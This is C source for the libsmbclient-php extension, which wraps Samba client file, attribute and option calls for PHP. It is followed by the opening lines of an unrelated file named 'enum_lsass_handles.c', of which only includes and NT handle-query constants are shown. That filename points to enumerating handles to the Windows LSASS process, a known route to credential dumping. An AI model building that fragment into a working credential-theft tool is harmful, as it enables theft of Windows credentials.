/* Returns 0 on failure, or 1 on success with *retval filled. */
if (flags_len != 1 && flags_len != 2) {
goto err;
}
if (flags_len == 2 && flags[1] != '+') {
goto err;
}
/* For both lengths, add the "core business" flags.
* See php_stream_parse_fopen_modes() in PHP's /main/streams/plain_wrapper.c
* for how PHP's native fopen() translates these flags: */
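	/* Resulting open flags for some example mode strings (derived from the
	 * switch below): "r" -> O_RDONLY, "w" -> O_CREAT|O_TRUNC|O_WRONLY,
	 * "a+" -> O_CREAT|O_APPEND|O_RDWR, "x" -> O_CREAT|O_EXCL|O_WRONLY. */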
switch (flags[0]) {
case 'r': *retval = 0; break;
case 'w': *retval = O_CREAT | O_TRUNC; break;
case 'a': *retval = O_CREAT | O_APPEND; break;
case 'x': *retval = O_CREAT | O_EXCL; break;
case 'c': *retval = O_CREAT; break;
default: goto err;
}
/* If length is 1, enforce read-only or write-only: */
if (flags_len == 1) {
*retval |= (*retval == 0) ? O_RDONLY : O_WRONLY;
return 1;
}
/* Length is 2 and this is a '+' mode, so read/write everywhere: */
*retval |= O_RDWR;
return 1;
err:
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid flag string '%s'", flags);
return 0;
}
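/* Illustrative PHP-side read of a remote file (a sketch; the URL and chunk
 * size are placeholders):
 *
 *   $fh = smbclient_open($state, 'smb://server/share/file.txt', 'r');
 *   while (($chunk = smbclient_read($state, $fh, 8192)) !== false && $chunk !== '') {
 *       echo $chunk;
 *   }
 *   smbclient_close($state, $fh);
 */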
PHP_FUNCTION(smbclient_open)
{
char *file, *flags;
strsize_t file_len, flags_len;
int smbflags;
zend_long mode = 0666;
zval *zstate;
SMBCFILE *handle;
smbc_open_fn smbc_open;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rss|l", &zstate, &file, &file_len, &flags, &flags_len, &mode) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
/* The flagstring is in the same format as the native fopen() uses, so
* one of the characters r, w, a, x, c, optionally followed by a plus.
* Need to translate this to an integer value for smbc_open: */
if (flagstring_to_smbflags(flags, flags_len, &smbflags TSRMLS_CC) == 0) {
RETURN_FALSE;
}
if ((smbc_open = smbc_getFunctionOpen(state->ctx)) == NULL) {
RETURN_FALSE;
}
if ((handle = smbc_open(state->ctx, file, smbflags, mode)) != NULL) {
#if PHP_MAJOR_VERSION >= 7
ZVAL_RES(return_value, zend_register_resource(handle, le_smbclient_file));
#else
ZEND_REGISTER_RESOURCE(return_value, handle, le_smbclient_file);
#endif
return;
}
hide_password(file, file_len);
switch (state->err = errno) {
case ENOMEM: php_error(E_WARNING, "Couldn't open %s: Out of memory", file); break;
case EINVAL: php_error(E_WARNING, "Couldn't open %s: No file?", file); break;
case EEXIST: php_error(E_WARNING, "Couldn't open %s: Pathname already exists and O_CREAT and O_EXECL were specified", file); break;
case EISDIR: php_error(E_WARNING, "Couldn't open %s: Can't write to a directory", file); break;
case EACCES: php_error(E_WARNING, "Couldn't open %s: Access denied", file); break;
case ENODEV: php_error(E_WARNING, "Couldn't open %s: Requested share does not exist", file); break;
case ENOTDIR: php_error(E_WARNING, "Couldn't open %s: Path component isn't a directory", file); break;
case ENOENT: php_error(E_WARNING, "Couldn't open %s: Directory in path doesn't exist", file); break;
default: php_error(E_WARNING, "Couldn't open %s: unknown error (%d)", file, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_creat)
{
char *file;
strsize_t file_len;
zend_long mode = 0666;
zval *zstate;
SMBCFILE *handle;
smbc_creat_fn smbc_creat;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs|l", &zstate, &file, &file_len, &mode) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_creat = smbc_getFunctionCreat(state->ctx)) == NULL) {
RETURN_FALSE;
}
if ((handle = smbc_creat(state->ctx, file, (mode_t)mode)) != NULL) {
#if PHP_MAJOR_VERSION >= 7
ZVAL_RES(return_value, zend_register_resource(handle, le_smbclient_file));
#else
ZEND_REGISTER_RESOURCE(return_value, handle, le_smbclient_file);
#endif
return;
}
hide_password(file, file_len);
switch (state->err = errno) {
case ENOMEM: php_error(E_WARNING, "Couldn't create %s: Out of memory", file); break;
case EINVAL: php_error(E_WARNING, "Couldn't create %s: No file?", file); break;
case EEXIST: php_error(E_WARNING, "Couldn't create %s: Pathname already exists and O_CREAT and O_EXECL were specified", file); break;
case EISDIR: php_error(E_WARNING, "Couldn't create %s: Can't write to a directory", file); break;
case EACCES: php_error(E_WARNING, "Couldn't create %s: Access denied", file); break;
case ENODEV: php_error(E_WARNING, "Couldn't create %s: Requested share does not exist", file); break;
case ENOENT: php_error(E_WARNING, "Couldn't create %s: Directory in path doesn't exist", file); break;
default: php_error(E_WARNING, "Couldn't create %s: unknown error (%d)", file, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_read)
{
zend_long count;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_read_fn smbc_read;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rrl", &zstate, &zfile, &count) == FAILURE) {
return;
}
if (count < 0) {
php_error(E_WARNING, "Negative byte count: %ld", count);
RETURN_FALSE;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_read = smbc_getFunctionRead(state->ctx)) == NULL) {
RETURN_FALSE;
}
#if PHP_MAJOR_VERSION >= 7
	zend_string *buf = zend_string_alloc(count, 0);
	ssize_t nbytes;
	/* Keep the return value in a signed temporary: assigning it directly to
	 * the unsigned ZSTR_LEN(buf) would make the >= 0 test always true and
	 * hide read errors. */
	if ((nbytes = smbc_read(state->ctx, file, ZSTR_VAL(buf), count)) >= 0) {
		ZSTR_LEN(buf) = nbytes;
		ZSTR_VAL(buf)[nbytes] = '\0';
		RETURN_STR(buf);
	}
	zend_string_release(buf);
#else
void *buf = emalloc(count);
ssize_t nbytes;
if ((nbytes = smbc_read(state->ctx, file, buf, count)) >= 0) {
RETURN_STRINGL(buf, nbytes, 0);
}
efree(buf);
#endif
switch (state->err = errno) {
case EISDIR: php_error(E_WARNING, "Read error: Is a directory"); break;
case EBADF: php_error(E_WARNING, "Read error: Not a valid file resource or not open for reading"); break;
case EINVAL: php_error(E_WARNING, "Read error: Object not suitable for reading or bad buffer"); break;
default: php_error(E_WARNING, "Read error: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
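/* Illustrative PHP-side write of a remote file (a sketch; the URL is a
 * placeholder):
 *
 *   $fh = smbclient_creat($state, 'smb://server/share/new.txt');
 *   smbclient_write($state, $fh, "hello world\n");
 *   smbclient_close($state, $fh);
 */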
PHP_FUNCTION(smbclient_write)
{
zend_long count = 0;
strsize_t str_len;
char * str;
size_t nwrite;
ssize_t nbytes;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_write_fn smbc_write;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rrs|l", &zstate, &zfile, &str, &str_len, &count) == FAILURE) {
return;
}
if (count < 0) {
php_error(E_WARNING, "Negative byte count: %ld", count);
RETURN_FALSE;
}
if (count == 0 || count > str_len) {
nwrite = str_len;
}
else {
nwrite = count;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_write = smbc_getFunctionWrite(state->ctx)) == NULL) {
RETURN_FALSE;
}
if ((nbytes = smbc_write(state->ctx, file, str, nwrite)) >= 0) {
RETURN_LONG(nbytes);
}
switch (state->err = errno) {
case EISDIR: php_error(E_WARNING, "Write error: Is a directory"); break;
case EBADF: php_error(E_WARNING, "Write error: Not a valid file resource or not open for reading"); break;
case EINVAL: php_error(E_WARNING, "Write error: Object not suitable for reading or bad buffer"); break;
case EACCES: php_error(E_WARNING, "Write error: Permission denied"); break;
default: php_error(E_WARNING, "Write error: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_lseek)
{
zend_long offset, whence, ret;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_lseek_fn smbc_lseek;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rrll", &zstate, &zfile, &offset, &whence) == FAILURE) {
return;
}
if ((int)whence != SEEK_SET && (int)whence != SEEK_CUR && (int)whence != SEEK_END) {
php_error(E_WARNING, "Invalid argument for whence");
RETURN_FALSE;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_lseek = smbc_getFunctionLseek(state->ctx)) == NULL) {
RETURN_FALSE;
}
if ((ret = smbc_lseek(state->ctx, file, (off_t)offset, (int)whence)) > -1) {
RETURN_LONG(ret);
}
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't lseek: resource is invalid"); break;
case EINVAL: php_error(E_WARNING, "Couldn't lseek: invalid parameters or not initialized"); break;
default: php_error(E_WARNING, "Couldn't lseek: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_ftruncate)
{
zend_long offset;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_ftruncate_fn smbc_ftruncate;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rrl", &zstate, &zfile, &offset) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_ftruncate = smbc_getFunctionFtruncate(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_ftruncate(state->ctx, file, offset) == 0) {
RETURN_TRUE;
}
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't ftruncate: resource is invalid"); break;
case EACCES: php_error(E_WARNING, "Couldn't ftruncate: permission denied"); break;
case EINVAL: php_error(E_WARNING, "Couldn't ftruncate: invalid parameters or not initialized"); break;
case ENOMEM: php_error(E_WARNING, "Couldn't ftruncate: out of memory"); break;
default: php_error(E_WARNING, "Couldn't ftruncate: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_close)
{
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_close_fn smbc_close;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rr", &zstate, &zfile) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_close = smbc_getFunctionClose(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_close(state->ctx, file) == 0) {
#if PHP_MAJOR_VERSION >= 7
zend_list_close(Z_RES_P(zfile));
#else
zend_list_delete(Z_LVAL_P(zfile));
#endif
RETURN_TRUE;
}
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Close error: Not a valid file resource or not open for reading"); break;
case EINVAL: php_error(E_WARNING, "Close error: State resource not initialized"); break;
default: php_error(E_WARNING, "Close error: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_chmod)
{
char *file;
strsize_t file_len;
zend_long mode;
zval *zstate;
smbc_chmod_fn smbc_chmod;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rsl", &zstate, &file, &file_len, &mode) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_chmod = smbc_getFunctionChmod(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_chmod(state->ctx, file, (mode_t)mode) == 0) {
RETURN_TRUE;
}
hide_password(file, file_len);
switch (state->err = errno) {
case EPERM: php_error(E_WARNING, "Couldn't chmod %s: the effective UID does not match the owner of the file, and is not zero", file); break;
case ENOENT: php_error(E_WARNING, "Couldn't chmod %s: file or directory does not exist", file); break;
case ENOMEM: php_error(E_WARNING, "Couldn't chmod %s: insufficient memory", file); break;
default: php_error(E_WARNING, "Couldn't chmod %s: unknown error (%d)", file, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_utimes)
{
char *file;
strsize_t file_len;
zend_long mtime = -1, atime = -1;
zval *zstate;
struct timeval times[2];
smbc_utimes_fn smbc_utimes;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs|ll", &zstate, &file, &file_len, &mtime, &atime) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
times[0].tv_usec = 0; /* times[0] = access time (atime) */
times[1].tv_usec = 0; /* times[1] = write time (mtime) */
/* TODO: we are a bit lazy here about the optional arguments and assume
* that if they are negative, they were omitted. This makes it
* impossible to use legitimate negative timestamps - a rare use-case. */
times[1].tv_sec = (mtime < 0) ? time(NULL) : mtime;
/* If not given, atime defaults to value of mtime: */
times[0].tv_sec = (atime < 0) ? times[1].tv_sec : atime;
if ((smbc_utimes = smbc_getFunctionUtimes(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_utimes(state->ctx, file, times) == 0) {
RETURN_TRUE;
}
hide_password(file, file_len);
switch (state->err = errno) {
case EINVAL: php_error(E_WARNING, "Couldn't set times on %s: the client library is not properly initialized", file); break;
case EPERM: php_error(E_WARNING, "Couldn't set times on %s: permission was denied", file); break;
default: php_error(E_WARNING, "Couldn't set times on %s: unknown error (%d)", file, errno); break;
}
RETURN_FALSE;
}
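/* Illustrative PHP-side attribute dump (a sketch; $url is a placeholder). Note
 * that the list contains every attribute name libsmbclient understands, not
 * just the ones present on the file (see the comment inside the function):
 *
 *   foreach (smbclient_listxattr($state, $url) as $name) {
 *       var_dump($name, smbclient_getxattr($state, $url, $name));
 *   }
 */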
PHP_FUNCTION(smbclient_listxattr)
{
char *url, *s, *c;
strsize_t url_len;
char values[1000];
zval *zstate;
smbc_listxattr_fn smbc_listxattr;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &url, &url_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_listxattr = smbc_getFunctionListxattr(state->ctx)) == NULL) {
RETURN_FALSE;
}
/* This is a bit of a bogus function. Looking in the Samba source, it
* always returns all possible attribute names, regardless of what the
* file system supports or which attributes the file actually has.
* Because this list is static, we can get away with using a fixed
* buffer size.*/
if (smbc_listxattr(state->ctx, url, values, sizeof(values)) >= 0) {
array_init(return_value);
/* Each attribute is null-separated, the list itself terminates
* with an empty element (i.e. two null bytes in a row). */
for (s = c = values; c < values + sizeof(values); c++) {
if (*c != '\0') {
continue;
}
/* c and s identical: last element */
if (s == c) {
break;
}
#if PHP_MAJOR_VERSION >= 7
add_next_index_stringl(return_value, s, c - s);
#else
add_next_index_stringl(return_value, s, c - s, 1);
#endif
s = c + 1;
}
return;
}
switch (state->err = errno) {
case EINVAL: php_error(E_WARNING, "Couldn't get xattrs: library not initialized"); break;
case ENOMEM: php_error(E_WARNING, "Couldn't get xattrs: out of memory"); break;
case EPERM: php_error(E_WARNING, "Couldn't get xattrs: permission denied"); break;
case ENOTSUP: php_error(E_WARNING, "Couldn't get xattrs: file system does not support extended attributes"); break;
default: php_error(E_WARNING, "Couldn't get xattrs: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_getxattr)
{
char *url, *name;
strsize_t url_len, name_len;
int retsize;
char values[1000];
zval *zstate;
smbc_getxattr_fn smbc_getxattr;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rss", &zstate, &url, &url_len, &name, &name_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_getxattr = smbc_getFunctionGetxattr(state->ctx)) == NULL) {
RETURN_FALSE;
}
/* TODO: 1000 chars should be enough for everyone...?
* However, doing an initial blank call to determine the response size
* seems wasteful, and vulnerable to a time-of-check, time-of-use
* error. */
if ((retsize = smbc_getxattr(state->ctx, url, name, values, sizeof(values))) >= 0) {
if (retsize > sizeof(values)) {
retsize = sizeof(values);
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRINGL(values, retsize);
#else
RETURN_STRINGL(values, retsize, 1);
#endif
}
hide_password(url, url_len);
switch (state->err = errno) {
case EINVAL: php_error(E_WARNING, "Couldn't get xattr for %s: library not initialized or incorrect parameter", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't get xattr for %s: out of memory", url); break;
case EPERM: php_error(E_WARNING, "Couldn't get xattr for %s: permission denied", url); break;
case ENOTSUP: php_error(E_WARNING, "Couldn't get xattr for %s: file system does not support extended attributes", url); break;
default: php_error(E_WARNING, "Couldn't get xattr for %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_setxattr)
{
char *url, *name, *val;
strsize_t url_len, name_len, val_len;
zend_long flags = 0;
zval *zstate;
smbc_setxattr_fn smbc_setxattr;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rsss|l", &zstate, &url, &url_len, &name, &name_len, &val, &val_len, &flags) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_setxattr = smbc_getFunctionSetxattr(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_setxattr(state->ctx, url, name, val, val_len, flags) == 0) {
RETURN_TRUE;
}
hide_password(url, url_len);
switch (state->err = errno) {
case EINVAL: php_error(E_WARNING, "Couldn't set attribute on %s: client library not properly initialized", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't set attribute on %s: out of memory", url); break;
case EEXIST: php_error(E_WARNING, "Couldn't set attribute on %s: attribute already exists", url); break;
case ENOATTR: php_error(E_WARNING, "Couldn't set attribute on %s: attribute does not exist", url); break;
case ENOTSUP: php_error(E_WARNING, "Couldn't set attribute on %s: not supported by filesystem", url); break;
case EPERM: php_error(E_WARNING, "Couldn't set attribute on %s: permission denied", url); break;
default: php_error(E_WARNING, "Couldn't set attribute on %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_removexattr)
{
char *url, *name;
strsize_t url_len, name_len;
zval *zstate;
smbc_removexattr_fn smbc_removexattr;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rss", &zstate, &url, &url_len, &name, &name_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_removexattr = smbc_getFunctionRemovexattr(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_removexattr(state->ctx, url, name) == 0) {
RETURN_TRUE;
}
hide_password(url, url_len);
switch (state->err = errno) {
case EINVAL: php_error(E_WARNING, "Couldn't remove attribute on %s: client library not properly initialized", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't remove attribute on %s: out of memory", url); break;
case ENOTSUP: php_error(E_WARNING, "Couldn't remove attribute on %s: not supported by filesystem", url); break;
case EPERM: php_error(E_WARNING, "Couldn't remove attribute on %s: permission denied", url); break;
default: php_error(E_WARNING, "Couldn't remove attribute on %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_option_get)
{
zend_long option;
const char *ret;
zval *zstate;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rl", &zstate, &option) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
switch (option)
{
case SMBCLIENT_OPT_OPEN_SHAREMODE:
RETURN_LONG(smbc_getOptionOpenShareMode(state->ctx));
case SMBCLIENT_OPT_ENCRYPT_LEVEL:
RETURN_LONG(smbc_getOptionSmbEncryptionLevel(state->ctx));
case SMBCLIENT_OPT_CASE_SENSITIVE:
RETURN_BOOL(smbc_getOptionCaseSensitive(state->ctx));
case SMBCLIENT_OPT_BROWSE_MAX_LMB_COUNT:
RETURN_LONG(smbc_getOptionBrowseMaxLmbCount(state->ctx));
case SMBCLIENT_OPT_URLENCODE_READDIR_ENTRIES:
RETURN_BOOL(smbc_getOptionUrlEncodeReaddirEntries(state->ctx));
case SMBCLIENT_OPT_USE_KERBEROS:
RETURN_BOOL(smbc_getOptionUseKerberos(state->ctx));
case SMBCLIENT_OPT_FALLBACK_AFTER_KERBEROS:
RETURN_BOOL(smbc_getOptionFallbackAfterKerberos(state->ctx));
/* Reverse the sense of this option, the original is confusing: */
case SMBCLIENT_OPT_AUTO_ANONYMOUS_LOGIN:
RETURN_BOOL(!(smbc_getOptionNoAutoAnonymousLogin(state->ctx)));
case SMBCLIENT_OPT_USE_CCACHE:
RETURN_BOOL(smbc_getOptionUseCCache(state->ctx));
#ifdef HAVE_SMBC_SETOPTIONUSENTHASH
case SMBCLIENT_OPT_USE_NT_HASH:
RETURN_BOOL(smbc_getOptionUseNTHash(state->ctx));
#endif
#ifdef HAVE_SMBC_SETPORT
case SMBCLIENT_OPT_PORT:
RETURN_LONG(smbc_getPort(state->ctx));
#endif
case SMBCLIENT_OPT_TIMEOUT:
RETURN_LONG(smbc_getTimeout(state->ctx));
case SMBCLIENT_OPT_NETBIOS_NAME:
if ((ret = smbc_getNetbiosName(state->ctx)) == NULL) {
RETURN_EMPTY_STRING();
}
if (strlen(ret) == 0) {
RETURN_EMPTY_STRING();
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRING(ret);
#else
RETURN_STRING(ret, 1);
#endif
case SMBCLIENT_OPT_WORKGROUP:
if ((ret = smbc_getWorkgroup(state->ctx)) == NULL) {
RETURN_EMPTY_STRING();
}
if (strlen(ret) == 0) {
RETURN_EMPTY_STRING();
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRING(ret);
#else
RETURN_STRING(ret, 1);
#endif
case SMBCLIENT_OPT_USER:
if ((ret = smbc_getUser(state->ctx)) == NULL) {
RETURN_EMPTY_STRING();
}
if (strlen(ret) == 0) {
RETURN_EMPTY_STRING();
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRING(ret);
#else
RETURN_STRING(ret, 1);
#endif
}
RETURN_NULL();
}
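/* Illustrative PHP-side option handling (a sketch):
 *
 *   smbclient_option_set($state, SMBCLIENT_OPT_USE_KERBEROS, true);
 *   smbclient_option_set($state, SMBCLIENT_OPT_USER, 'guest');
 *   $timeout = smbclient_option_get($state, SMBCLIENT_OPT_TIMEOUT);
 */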
PHP_FUNCTION(smbclient_option_set)
{
zend_long option, vbool = 0;
zval *zstate;
zval *zvalue;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rlz", &zstate, &option, &zvalue) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
switch (Z_TYPE_P(zvalue))
{
#if PHP_MAJOR_VERSION >= 7
case IS_TRUE:
vbool = 1;
/* no break, fallthrough */
case IS_FALSE:
#else
case IS_BOOL:
vbool = Z_BVAL_P(zvalue);
#endif
switch (option)
{
case SMBCLIENT_OPT_CASE_SENSITIVE:
smbc_setOptionCaseSensitive(state->ctx, vbool);
RETURN_TRUE;
case SMBCLIENT_OPT_URLENCODE_READDIR_ENTRIES:
smbc_setOptionUrlEncodeReaddirEntries(state->ctx, vbool);
RETURN_TRUE;
case SMBCLIENT_OPT_USE_KERBEROS:
smbc_setOptionUseKerberos(state->ctx, vbool);
RETURN_TRUE;
case SMBCLIENT_OPT_FALLBACK_AFTER_KERBEROS:
smbc_setOptionFallbackAfterKerberos(state->ctx, vbool);
RETURN_TRUE;
/* Reverse the sense of this option: */
case SMBCLIENT_OPT_AUTO_ANONYMOUS_LOGIN:
smbc_setOptionNoAutoAnonymousLogin(state->ctx, !(vbool));
RETURN_TRUE;
case SMBCLIENT_OPT_USE_CCACHE:
smbc_setOptionUseCCache(state->ctx, vbool);
RETURN_TRUE;
#ifdef HAVE_SMBC_SETOPTIONUSENTHASH
case SMBCLIENT_OPT_USE_NT_HASH:
smbc_setOptionUseNTHash(state->ctx, vbool);
RETURN_TRUE;
#endif
}
break;
case IS_LONG:
switch (option)
{
case SMBCLIENT_OPT_OPEN_SHAREMODE:
smbc_setOptionOpenShareMode(state->ctx, Z_LVAL_P(zvalue));
RETURN_TRUE;
case SMBCLIENT_OPT_ENCRYPT_LEVEL:
smbc_setOptionSmbEncryptionLevel(state->ctx, Z_LVAL_P(zvalue));
RETURN_TRUE;
case SMBCLIENT_OPT_BROWSE_MAX_LMB_COUNT:
smbc_setOptionBrowseMaxLmbCount(state->ctx, Z_LVAL_P(zvalue));
RETURN_TRUE;
#ifdef HAVE_SMBC_SETPORT
case SMBCLIENT_OPT_PORT:
smbc_setPort(state->ctx, Z_LVAL_P(zvalue));
RETURN_TRUE;
#endif
case SMBCLIENT_OPT_TIMEOUT:
smbc_setTimeout(state->ctx, Z_LVAL_P(zvalue));
RETURN_TRUE;
}
break;
case IS_STRING:
switch (option)
{
case SMBCLIENT_OPT_NETBIOS_NAME:
smbc_setNetbiosName(state->ctx, Z_STRVAL_P(zvalue));
RETURN_TRUE;
/* For the next two options, update our state object as well: */
case SMBCLIENT_OPT_WORKGROUP:
if (ctx_init_getauth(zvalue, &state->wrkg, &state->wrkglen, "workgroup") == 0) {
RETURN_FALSE;
}
smbc_setWorkgroup(state->ctx, Z_STRVAL_P(zvalue));
RETURN_TRUE;
case SMBCLIENT_OPT_USER:
if (ctx_init_getauth(zvalue, &state->user, &state->userlen, "username") == 0) {
RETURN_FALSE;
}
smbc_setUser(state->ctx, Z_STRVAL_P(zvalue));
RETURN_TRUE;
}
break;
}
RETURN_FALSE;
}
#if HAVE_SMBC_SETOPTIONPROTOCOLS
PHP_FUNCTION(smbclient_client_protocols)
{
zval *zstate;
char *minproto = NULL, *maxproto = NULL;
strsize_t minproto_len, maxproto_len;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r|s!s!", &zstate, &minproto, &minproto_len, &maxproto, &maxproto_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
RETURN_BOOL(smbc_setOptionProtocols(state->ctx, minproto, maxproto));
}
#endif
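/* Illustrative PHP-side free-space check (a sketch; the URL is a placeholder,
 * and multiplying 'bavail' by 'frsize' follows the usual statvfs convention,
 * which may vary per server):
 *
 *   $vfs = smbclient_statvfs($state, 'smb://server/share/');
 *   $free_bytes = $vfs['bavail'] * $vfs['frsize'];
 */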
PHP_FUNCTION(smbclient_statvfs)
{
char *url;
strsize_t url_len;
zval *zstate;
struct statvfs st;
smbc_statvfs_fn smbc_statvfs;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &url, &url_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_statvfs = smbc_getFunctionStatVFS(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_statvfs(state->ctx, url, &st) != 0) {
hide_password(url, url_len);
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't statvfs %s: bad file descriptor", url); break;
case EACCES: php_error(E_WARNING, "Couldn't statvfs %s: permission denied", url); break;
case EINVAL: php_error(E_WARNING, "Couldn't statvfs %s: library not initalized or otherwise invalid", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't statvfs %s: out of memory", url); break;
default: php_error(E_WARNING, "Couldn't statvfs %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
array_init(return_value);
add_assoc_long(return_value, "bsize", st.f_bsize);
add_assoc_long(return_value, "frsize", st.f_frsize);
add_assoc_long(return_value, "blocks", st.f_blocks);
add_assoc_long(return_value, "bfree", st.f_bfree);
add_assoc_long(return_value, "bavail", st.f_bavail);
add_assoc_long(return_value, "files", st.f_files);
add_assoc_long(return_value, "ffree", st.f_ffree);
add_assoc_long(return_value, "favail", st.f_favail);
add_assoc_long(return_value, "fsid", st.f_fsid);
add_assoc_long(return_value, "flag", st.f_flag);
add_assoc_long(return_value, "namemax", st.f_namemax);
}
PHP_FUNCTION(smbclient_fstatvfs)
{
zval *zstate;
zval *zfile;
SMBCFILE *file;
struct statvfs st;
smbc_fstatvfs_fn smbc_fstatvfs;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rr", &zstate, &zfile) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_fstatvfs = smbc_getFunctionFstatVFS(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_fstatvfs(state->ctx, file, &st) != 0) {
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't fstatvfs: bad file descriptor"); break;
case EACCES: php_error(E_WARNING, "Couldn't fstatvfs: permission denied"); break;
case EINVAL: php_error(E_WARNING, "Couldn't fstatvfs: library not initalized or otherwise invalid"); break;
case ENOMEM: php_error(E_WARNING, "Couldn't fstatvfs: out of memory"); break;
default: php_error(E_WARNING, "Couldn't fstatvfs: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
array_init(return_value);
add_assoc_long(return_value, "bsize", st.f_bsize);
add_assoc_long(return_value, "frsize", st.f_frsize);
add_assoc_long(return_value, "blocks", st.f_blocks);
add_assoc_long(return_value, "bfree", st.f_bfree);
add_assoc_long(return_value, "bavail", st.f_bavail);
add_assoc_long(return_value, "files", st.f_files);
add_assoc_long(return_value, "ffree", st.f_ffree);
add_assoc_long(return_value, "favail", st.f_favail);
add_assoc_long(return_value, "fsid", st.f_fsid);
add_assoc_long(return_value, "flag", st.f_flag);
add_assoc_long(return_value, "namemax", st.f_namemax);
}
| remicollet/libsmbclient-php |
<|start_filename|>enum_lsass_handles.c<|end_filename|>
#ifndef UNICODE
#define UNICODE
#endif
#include <windows.h>
#include <stdio.h>
#include <wchar.h>
#define NT_SUCCESS(x) ((x) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
#define SystemHandleInformation 16
#define ObjectBasicInformation 0
#define ObjectNameInformation 1
#define ObjectTypeInformation 2
